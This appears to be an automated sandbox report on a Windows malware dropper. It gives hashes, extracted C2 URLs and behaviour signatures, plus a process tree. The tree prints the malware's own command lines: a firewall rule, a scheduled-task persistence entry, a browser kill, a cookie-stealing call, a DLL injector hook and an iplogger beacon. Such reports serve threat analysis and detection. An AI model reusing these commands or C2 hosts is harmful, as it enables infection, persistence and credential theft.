Analysis
max time kernel: 152s
max time network: 157s
platform: windows10-2004_x64
resource: win10v2004-en-20220113
submitted: 10-03-2022 20:28
Static task: static1
Behavioral task: behavioral1
Sample: 4b00065eb8b38f3aef20729f307f7ca5af333afb63c661e6f11fbb4857ac0a43.exe
Resource: win7-20220223-en
Behavioral task: behavioral2
Sample: 4b00065eb8b38f3aef20729f307f7ca5af333afb63c661e6f11fbb4857ac0a43.exe
Resource: win10v2004-en-20220113
General
Target: 4b00065eb8b38f3aef20729f307f7ca5af333afb63c661e6f11fbb4857ac0a43.exe
Size: 8.1MB
MD5: 7b943037183df91e5e8bd3ee835872a6
SHA1: 99479cabfb6127ce3f1a47705c06ae9ce80bccce
SHA256: 4b00065eb8b38f3aef20729f307f7ca5af333afb63c661e6f11fbb4857ac0a43
SHA512: d2e5d5d7ca17b2fe9382cf4d597dfbeef130ebb2ff7c8651ea6327b298fbe53ddceaece1e0131d3563940a5513d09355c000480f4ae211f46e5ed86a167323c0
Malware Config
Extracted: socelars
C2:
  http://www.iyiqian.com/
  http://www.xxhufdc.top/
  http://www.uefhkice.xyz/
  http://www.fcektsy.top/
Extracted: metasploit
Payload: windows/single_exec
Extracted: smokeloader
Version: 2020
C2:
  http://aucmoney.com/upload/
  http://thegymmum.com/upload/
  http://atvcampingtrips.com/upload/
  http://kuapakualaman.com/upload/
  http://renatazarazua.com/upload/
  http://nasufmutlu.com/upload/
Signatures

Glupteba Payload (5 IoCs)
Processes:
  resource | yara_rule
  behavioral2/memory/3816-142-0x0000000005280000-0x0000000005BA6000-memory.dmp | family_glupteba
  behavioral2/memory/3816-162-0x0000000000400000-0x00000000030ED000-memory.dmp | family_glupteba
  behavioral2/memory/1284-201-0x0000000005200000-0x0000000005B26000-memory.dmp | family_glupteba
  behavioral2/memory/1284-202-0x0000000000400000-0x00000000030ED000-memory.dmp | family_glupteba
  behavioral2/memory/5144-207-0x0000000000400000-0x00000000030ED000-memory.dmp | family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

Process spawned unexpected child process (1 IoCs)
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
  description | pid | pid_target | process
  Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 3504 | 3288 | rUNdlL32.eXe

SmokeLoader
Modular backdoor trojan in use since 2014.

Socelars Payload (2 IoCs)
Processes:
  resource | yara_rule
  C:\Users\Admin\AppData\Local\Temp\Install.exe | family_socelars
  C:\Users\Admin\AppData\Local\Temp\Install.exe | family_socelars

Suspicious use of NtCreateUserProcessOtherParentProcess (2 IoCs)
Processes:
  description | pid | process | target process
  PID 4916 created 3816 | 4916 | svchost.exe | Info.exe
  PID 4916 created 5144 | 4916 | svchost.exe | csrss.exe

suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3

suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3

Downloads MZ/PE file

Executes dropped EXE (18 IoCs)
Processes:
  pid | process
  2364 | Updbdate.exe
  3816 | Info.exe
  4892 | Folder.exe
  2060 | md9_1sjm.exe
  1468 | Install.exe
  3596 | Folder.exe
  1392 | File.exe
  4032 | pub2.exe
  4564 | WerFault.exe
  5060 | Files.exe
  1288 | KRSetp.exe
  3840 | jfiag3g_gg.exe
  1448 | jfiag3g_gg.exe
  1284 | Info.exe
  5144 | csrss.exe
  1676 | injector.exe
  2124 | sHHgfnWbYrhYH15l5vk6FQMv.exe
  5552 | cwbgidu

Modifies Windows Firewall (1 TTPs)

[signature name not preserved in the extracted text]
Processes:
  resource | yara_rule
  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe | upx
  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe | upx
  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe | upx
  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe | upx

Checks computer location settings (2 TTPs, 3 IoCs)
Looks up country code configured in the registry, likely geofence.
Processes:
  description | ioc | process
  Key value queried | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation | 4b00065eb8b38f3aef20729f307f7ca5af333afb63c661e6f11fbb4857ac0a43.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation | Folder.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation | File.exe

Loads dropped DLL (1 IoCs)
Processes:
  pid | process
  936 | WerFault.exe

Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Adds Run key to start application (2 TTPs, 3 IoCs)
Processes:
  description | ioc | process
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.ex" | Files.exe
  Set value (str) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MistyWave = "\"C:\\Windows\\rss\\csrss.exe\"" | Info.exe
  Key created | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Windows\CurrentVersion\Run | msedge.exe

Checks installed software on the system (1 TTPs)
Looks up Uninstall key entries in the registry to enumerate software on the system.

[signature name not preserved in the extracted text]
Processes:
  description | ioc | process
  Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | md9_1sjm.exe

Legitimate hosting services abused for malware hosting/C2 (1 TTPs)

Looks up external IP address via web service (5 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
  flow | ioc
  154 | ipinfo.io
  157 | api.db-ip.com
  158 | api.db-ip.com
  17 | ip-api.com
  153 | ipinfo.io

Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.

AutoIT Executable (2 IoCs)
AutoIT scripts compiled to PE executables.
Processes:
  resource | yara_rule
  C:\Users\Admin\AppData\Local\Temp\jamesold.exe | autoit_exe
  C:\Users\Admin\AppData\Local\Temp\jamesold.exe | autoit_exe

Drops file in Program Files directory (2 IoCs)
Processes:
  description | ioc | process
  File created | C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\349e8308-6def-40db-ba45-1273618e3896.tmp | setup.exe
  File opened for modification | C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20220129011035.pma | setup.exe

Drops file in Windows directory (2 IoCs)
Processes:
  description | ioc | process
  File opened for modification | C:\Windows\rss | Info.exe
  File created | C:\Windows\rss\csrss.exe | Info.exe

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Program crash (64 IoCs)

Checks SCSI registry key(s) (3 TTPs, 6 IoCs)
SCSI information is often read in order to detect sandboxing environments.
Processes:
  description | ioc | process
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | pub2.exe
  Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | pub2.exe
  Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | pub2.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | cwbgidu
  Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | cwbgidu
  Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | cwbgidu

Creates scheduled task(s) (1 TTPs, 1 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.

Enumerates system info in registry (2 TTPs, 3 IoCs)
Processes:
  description | ioc | process
  Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe

Kills process with taskkill (1 IoCs)
Processes:
  pid | process
  4424 | taskkill.exe

Modifies data under HKEY_USERS (64 IoCs)

Modifies registry class (4 IoCs)
Processes:
  description | ioc | process
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ |
  Key created | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ |
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ |
  Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | msedge.exe

Suspicious behavior: EnumeratesProcesses (64 IoCs)

Suspicious behavior: MapViewOfSection (2 IoCs)
Processes:
  pid | process
  4032 | pub2.exe
  5552 | cwbgidu

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary (4 IoCs)
Processes:
  pid | process
  1380 | msedge.exe
  1380 | msedge.exe
  1380 | msedge.exe
  1380 | msedge.exe

Suspicious use of AdjustPrivilegeToken (64 IoCs)

Suspicious use of FindShellTrayWindow (12 IoCs)
Processes:
  pid | process
  4564 | WerFault.exe
  4564 | WerFault.exe
  4564 | WerFault.exe
  4564 | WerFault.exe
  4564 | WerFault.exe
  1380 | msedge.exe
  1380 | msedge.exe
  1380 | msedge.exe
  2712 |
  2712 |
  2712 |
  2712 |

Suspicious use of SendNotifyMessage (5 IoCs)
Processes:
  pid | process
  4564 | WerFault.exe
  4564 | WerFault.exe
  4564 | WerFault.exe
  4564 | WerFault.exe
  4564 | WerFault.exe

Suspicious use of SetWindowsHookEx (1 IoCs)
Processes:
  pid | process
  1392 | File.exe

Suspicious use of WriteProcessMemory (64 IoCs)
Processes
Nesting level is shown in brackets and child processes are indented under their parent; each process is followed by its command line and the signatures it triggered.

[1] C:\Users\Admin\AppData\Local\Temp\4b00065eb8b38f3aef20729f307f7ca5af333afb63c661e6f11fbb4857ac0a43.exe
    command: "C:\Users\Admin\AppData\Local\Temp\4b00065eb8b38f3aef20729f307f7ca5af333afb63c661e6f11fbb4857ac0a43.exe"
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
  [2] C:\Users\Admin\AppData\Local\Temp\Updbdate.exe
      command: "C:\Users\Admin\AppData\Local\Temp\Updbdate.exe"
      - Executes dropped EXE
      - Suspicious use of AdjustPrivilegeToken
  [2] C:\Users\Admin\AppData\Local\Temp\Info.exe
      command: "C:\Users\Admin\AppData\Local\Temp\Info.exe"
      - Executes dropped EXE
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\SysWOW64\WerFault.exe
        command: C:\Windows\SysWOW64\WerFault.exe -u -p 3816 -s 368
        - Program crash
    [3] C:\Windows\SysWOW64\WerFault.exe
        command: C:\Windows\SysWOW64\WerFault.exe -u -p 3816 -s 372
        - Program crash
    [3] C:\Windows\SysWOW64\WerFault.exe
        command: C:\Windows\SysWOW64\WerFault.exe -u -p 3816 -s 372
        - Program crash
    [3] C:\Windows\SysWOW64\WerFault.exe
        command: C:\Windows\SysWOW64\WerFault.exe -u -p 3816 -s 660
        - Program crash
    [3] C:\Windows\SysWOW64\WerFault.exe
        command: C:\Windows\SysWOW64\WerFault.exe -u -p 3816 -s 660
        - Program crash
    [3] C:\Windows\SysWOW64\WerFault.exe
        command: C:\Windows\SysWOW64\WerFault.exe -u -p 3816 -s 712
        - Program crash
    [3] C:\Windows\SysWOW64\WerFault.exe
        command: C:\Windows\SysWOW64\WerFault.exe -u -p 3816 -s 732
        - Program crash
    [3] C:\Windows\SysWOW64\WerFault.exe
        command: C:\Windows\SysWOW64\WerFault.exe -u -p 3816 -s 740
        - Executes dropped EXE
        - Program crash
        - Suspicious use of FindShellTrayWindow
        - Suspicious use of SendNotifyMessage
    [3] C:\Windows\SysWOW64\WerFault.exe
        command: C:\Windows\SysWOW64\WerFault.exe -u -p 3816 -s 688
        - Program crash
    [3] C:\Windows\SysWOW64\WerFault.exe
        command: C:\Windows\SysWOW64\WerFault.exe -u -p 3816 -s 868
        - Program crash
    [3] C:\Windows\SysWOW64\WerFault.exe
        command: C:\Windows\SysWOW64\WerFault.exe -u -p 3816 -s 884
        - Program crash
    [3] C:\Windows\SysWOW64\WerFault.exe
        command: C:\Windows\SysWOW64\WerFault.exe -u -p 3816 -s 608
        - Program crash
    [3] C:\Windows\SysWOW64\WerFault.exe
        command: C:\Windows\SysWOW64\WerFault.exe -u -p 3816 -s 600
        - Program crash
    [3] C:\Windows\SysWOW64\WerFault.exe
        command: C:\Windows\SysWOW64\WerFault.exe -u -p 3816 -s 660
        - Program crash
    [3] C:\Windows\SysWOW64\WerFault.exe
        command: C:\Windows\SysWOW64\WerFault.exe -u -p 3816 -s 804
        - Program crash
    [3] C:\Windows\SysWOW64\WerFault.exe
        command: C:\Windows\SysWOW64\WerFault.exe -u -p 3816 -s 912
        - Loads dropped DLL
        - Program crash
    [3] C:\Windows\SysWOW64\WerFault.exe
        command: C:\Windows\SysWOW64\WerFault.exe -u -p 3816 -s 604
        - Program crash
    [3] C:\Windows\SysWOW64\WerFault.exe
        command: C:\Windows\SysWOW64\WerFault.exe -u -p 3816 -s 720
        - Program crash
    [3] C:\Windows\SysWOW64\WerFault.exe
        command: C:\Windows\SysWOW64\WerFault.exe -u -p 3816 -s 864
        - Program crash
    [3] C:\Windows\SysWOW64\WerFault.exe
        command: C:\Windows\SysWOW64\WerFault.exe -u -p 3816 -s 628
        - Program crash
    [3] C:\Windows\SysWOW64\WerFault.exe
        command: C:\Windows\SysWOW64\WerFault.exe -u -p 3816 -s 880
        - Program crash
    [3] C:\Users\Admin\AppData\Local\Temp\Info.exe
        command: "C:\Users\Admin\AppData\Local\Temp\Info.exe"
        - Executes dropped EXE
        - Adds Run key to start application
        - Drops file in Windows directory
        - Modifies data under HKEY_USERS
        - Suspicious behavior: EnumeratesProcesses
      [4] C:\Windows\SysWOW64\WerFault.exe
          command: C:\Windows\SysWOW64\WerFault.exe -u -p 1284 -s 332
          - Program crash
      [4] C:\Windows\SysWOW64\WerFault.exe
          command: C:\Windows\SysWOW64\WerFault.exe -u -p 1284 -s 336
          - Program crash
      [4] C:\Windows\SysWOW64\WerFault.exe
          command: C:\Windows\SysWOW64\WerFault.exe -u -p 1284 -s 336
          - Program crash
      [4] C:\Windows\SysWOW64\WerFault.exe
          command: C:\Windows\SysWOW64\WerFault.exe -u -p 1284 -s 588
          - Program crash
      [4] C:\Windows\SysWOW64\WerFault.exe
          command: C:\Windows\SysWOW64\WerFault.exe -u -p 1284 -s 668
          - Program crash
      [4] C:\Windows\SysWOW64\WerFault.exe
          command: C:\Windows\SysWOW64\WerFault.exe -u -p 1284 -s 668
          - Program crash
      [4] C:\Windows\SysWOW64\WerFault.exe
          command: C:\Windows\SysWOW64\WerFault.exe -u -p 1284 -s 668
          - Program crash
      [4] C:\Windows\SysWOW64\WerFault.exe
          command: C:\Windows\SysWOW64\WerFault.exe -u -p 1284 -s 700
          - Program crash
      [4] C:\Windows\SysWOW64\WerFault.exe
          command: C:\Windows\SysWOW64\WerFault.exe -u -p 1284 -s 724
          - Program crash
      [4] C:\Windows\SysWOW64\WerFault.exe
          command: C:\Windows\SysWOW64\WerFault.exe -u -p 1284 -s 572
          - Program crash
      [4] C:\Windows\SysWOW64\WerFault.exe
          command: C:\Windows\SysWOW64\WerFault.exe -u -p 1284 -s 816
          - Program crash
      [4] C:\Windows\SysWOW64\WerFault.exe
          command: C:\Windows\SysWOW64\WerFault.exe -u -p 1284 -s 712
          - Program crash
      [4] C:\Windows\SysWOW64\WerFault.exe
          command: C:\Windows\SysWOW64\WerFault.exe -u -p 1284 -s 836
          - Program crash
      [4] C:\Windows\SysWOW64\WerFault.exe
          command: C:\Windows\SysWOW64\WerFault.exe -u -p 1284 -s 696
          - Program crash
      [4] C:\Windows\SysWOW64\WerFault.exe
          command: C:\Windows\SysWOW64\WerFault.exe -u -p 1284 -s 848
          - Program crash
      [4] C:\Windows\system32\cmd.exe
          command: C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        [5] C:\Windows\system32\netsh.exe
            command: netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
      [4] C:\Windows\SysWOW64\WerFault.exe
          command: C:\Windows\SysWOW64\WerFault.exe -u -p 1284 -s 696
          - Program crash
      [4] C:\Windows\SysWOW64\WerFault.exe
          command: C:\Windows\SysWOW64\WerFault.exe -u -p 1284 -s 752
          - Program crash
      [4] C:\Windows\rss\csrss.exe
          command: C:\Windows\rss\csrss.exe /94-94
          - Executes dropped EXE
        [5] C:\Windows\SysWOW64\WerFault.exe
            command: C:\Windows\SysWOW64\WerFault.exe -u -p 5144 -s 368
            - Program crash
        [5] C:\Windows\SysWOW64\WerFault.exe
            command: C:\Windows\SysWOW64\WerFault.exe -u -p 5144 -s 372
            - Program crash
        [5] C:\Windows\SysWOW64\WerFault.exe
            command: C:\Windows\SysWOW64\WerFault.exe -u -p 5144 -s 372
            - Program crash
        [5] C:\Windows\SysWOW64\WerFault.exe
            command: C:\Windows\SysWOW64\WerFault.exe -u -p 5144 -s 652
            - Program crash
        [5] C:\Windows\SysWOW64\WerFault.exe
            command: C:\Windows\SysWOW64\WerFault.exe -u -p 5144 -s 656
            - Program crash
        [5] C:\Windows\SysWOW64\WerFault.exe
            command: C:\Windows\SysWOW64\WerFault.exe -u -p 5144 -s 656
            - Program crash
        [5] C:\Windows\SysWOW64\WerFault.exe
            command: C:\Windows\SysWOW64\WerFault.exe -u -p 5144 -s 736
            - Program crash
        [5] C:\Windows\SysWOW64\WerFault.exe
            command: C:\Windows\SysWOW64\WerFault.exe -u -p 5144 -s 744
            - Program crash
        [5] C:\Windows\SysWOW64\WerFault.exe
            command: C:\Windows\SysWOW64\WerFault.exe -u -p 5144 -s 764
            - Program crash
        [5] C:\Windows\SysWOW64\WerFault.exe
            command: C:\Windows\SysWOW64\WerFault.exe -u -p 5144 -s 716
            - Program crash
        [5] C:\Windows\SysWOW64\WerFault.exe
            command: C:\Windows\SysWOW64\WerFault.exe -u -p 5144 -s 816
            - Program crash
        [5] C:\Windows\SysWOW64\WerFault.exe
            command: C:\Windows\SysWOW64\WerFault.exe -u -p 5144 -s 896
            - Program crash
        [5] C:\Windows\SysWOW64\WerFault.exe
            command: C:\Windows\SysWOW64\WerFault.exe -u -p 5144 -s 896
            - Program crash
        [5] C:\Windows\SYSTEM32\schtasks.exe
            command: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
            - Creates scheduled task(s)
        [5] C:\Windows\SysWOW64\WerFault.exe
            command: C:\Windows\SysWOW64\WerFault.exe -u -p 5144 -s 944
            - Program crash
        [5] C:\Windows\SysWOW64\WerFault.exe
            command: C:\Windows\SysWOW64\WerFault.exe -u -p 5144 -s 868
            - Program crash
        [5] C:\Windows\SysWOW64\WerFault.exe
            command: C:\Windows\SysWOW64\WerFault.exe -u -p 5144 -s 868
            - Program crash
        [5] C:\Windows\SysWOW64\WerFault.exe
            command: C:\Windows\SysWOW64\WerFault.exe -u -p 5144 -s 1008
            - Program crash
        [5] C:\Windows\SysWOW64\WerFault.exe
            command: C:\Windows\SysWOW64\WerFault.exe -u -p 5144 -s 972
            - Program crash
        [5] C:\Windows\SysWOW64\WerFault.exe
            command: C:\Windows\SysWOW64\WerFault.exe -u -p 5144 -s 752
            - Program crash
        [5] C:\Windows\SysWOW64\WerFault.exe
            command: C:\Windows\SysWOW64\WerFault.exe -u -p 5144 -s 1124
            - Program crash
        [5] C:\Windows\SysWOW64\WerFault.exe
            command: C:\Windows\SysWOW64\WerFault.exe -u -p 5144 -s 1136
            - Program crash
        [5] C:\Windows\SysWOW64\WerFault.exe
            command: C:\Windows\SysWOW64\WerFault.exe -u -p 5144 -s 988
            - Program crash
        [5] C:\Windows\SysWOW64\WerFault.exe
            command: C:\Windows\SysWOW64\WerFault.exe -u -p 5144 -s 1080
            - Program crash
        [5] C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
            command: C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
            - Executes dropped EXE
        [5] C:\Windows\SysWOW64\WerFault.exe
            command: C:\Windows\SysWOW64\WerFault.exe -u -p 5144 -s 1032
            - Program crash
        [5] C:\Windows\SysWOW64\WerFault.exe
            command: C:\Windows\SysWOW64\WerFault.exe -u -p 5144 -s 1172
        [5] C:\Windows\SysWOW64\WerFault.exe
            command: C:\Windows\SysWOW64\WerFault.exe -u -p 5144 -s 1164
        [5] C:\Windows\SysWOW64\WerFault.exe
            command: C:\Windows\SysWOW64\WerFault.exe -u -p 5144 -s 944
    [3] C:\Windows\SysWOW64\WerFault.exe
        command: C:\Windows\SysWOW64\WerFault.exe -u -p 3816 -s 824
        - Program crash
  [2] C:\Users\Admin\AppData\Local\Temp\Folder.exe
      command: "C:\Users\Admin\AppData\Local\Temp\Folder.exe"
      - Executes dropped EXE
      - Checks computer location settings
      - Suspicious use of WriteProcessMemory
    [3] C:\Users\Admin\AppData\Local\Temp\Folder.exe
        command: "C:\Users\Admin\AppData\Local\Temp\Folder.exe" -a
        - Executes dropped EXE
  [2] C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe
      command: "C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe"
      - Executes dropped EXE
      - Checks whether UAC is enabled
      - Suspicious use of AdjustPrivilegeToken
  [2] C:\Users\Admin\AppData\Local\Temp\Install.exe
      command: "C:\Users\Admin\AppData\Local\Temp\Install.exe"
      - Executes dropped EXE
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\cmd.exe
        command: cmd.exe /c taskkill /f /im chrome.exe
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\SysWOW64\taskkill.exe
          command: taskkill /f /im chrome.exe
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
  [2] C:\Users\Admin\AppData\Local\Temp\File.exe
      command: "C:\Users\Admin\AppData\Local\Temp\File.exe"
      - Executes dropped EXE
      - Checks computer location settings
      - Suspicious use of SetWindowsHookEx
    [3] C:\Users\Admin\Pictures\Adobe Films\sHHgfnWbYrhYH15l5vk6FQMv.exe
        command: "C:\Users\Admin\Pictures\Adobe Films\sHHgfnWbYrhYH15l5vk6FQMv.exe"
        - Executes dropped EXE
    [3] C:\Windows\SysWOW64\WerFault.exe
        command: C:\Windows\SysWOW64\WerFault.exe -u -p 1392 -s 2304
  [2] C:\Users\Admin\AppData\Local\Temp\pub2.exe
      command: "C:\Users\Admin\AppData\Local\Temp\pub2.exe"
      - Executes dropped EXE
      - Checks SCSI registry key(s)
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious behavior: MapViewOfSection
  [2] C:\Users\Admin\AppData\Local\Temp\jamesold.exe
      command: "C:\Users\Admin\AppData\Local\Temp\jamesold.exe"
  [2] C:\Users\Admin\AppData\Local\Temp\Files.exe
      command: "C:\Users\Admin\AppData\Local\Temp\Files.exe"
      - Executes dropped EXE
      - Adds Run key to start application
      - Suspicious use of WriteProcessMemory
    [3] C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        command: C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        - Executes dropped EXE
    [3] C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        command: C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        - Executes dropped EXE
        - Suspicious behavior: EnumeratesProcesses
  [2] C:\Users\Admin\AppData\Local\Temp\KRSetp.exe
      command: "C:\Users\Admin\AppData\Local\Temp\KRSetp.exe"
      - Executes dropped EXE
      - Suspicious use of AdjustPrivilegeToken
  [2] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1rPS67
      - Adds Run key to start application
      - Enumerates system info in registry
      - Modifies registry class
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      - Suspicious use of FindShellTrayWindow
      - Suspicious use of WriteProcessMemory
    [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff8b5346f8,0x7fff8b534708,0x7fff8b534718
    [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2184,15193153220932369557,1447791576567383018,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2208 /prefetch:2
    [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2184,15193153220932369557,1447791576567383018,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2260 /prefetch:3
        - Suspicious behavior: EnumeratesProcesses
    [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2184,15193153220932369557,1447791576567383018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2764 /prefetch:8
    [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,15193153220932369557,1447791576567383018,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3376 /prefetch:1
    [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,15193153220932369557,1447791576567383018,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:1
    [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2184,15193153220932369557,1447791576567383018,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5296 /prefetch:8
    [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,15193153220932369557,1447791576567383018,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5564 /prefetch:1
    [3] C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2184,15193153220932369557,1447791576567383018,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3792 /prefetch:1
    [3] C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        command: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2184,15193153220932369557,1447791576567383018,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6324 /prefetch:8
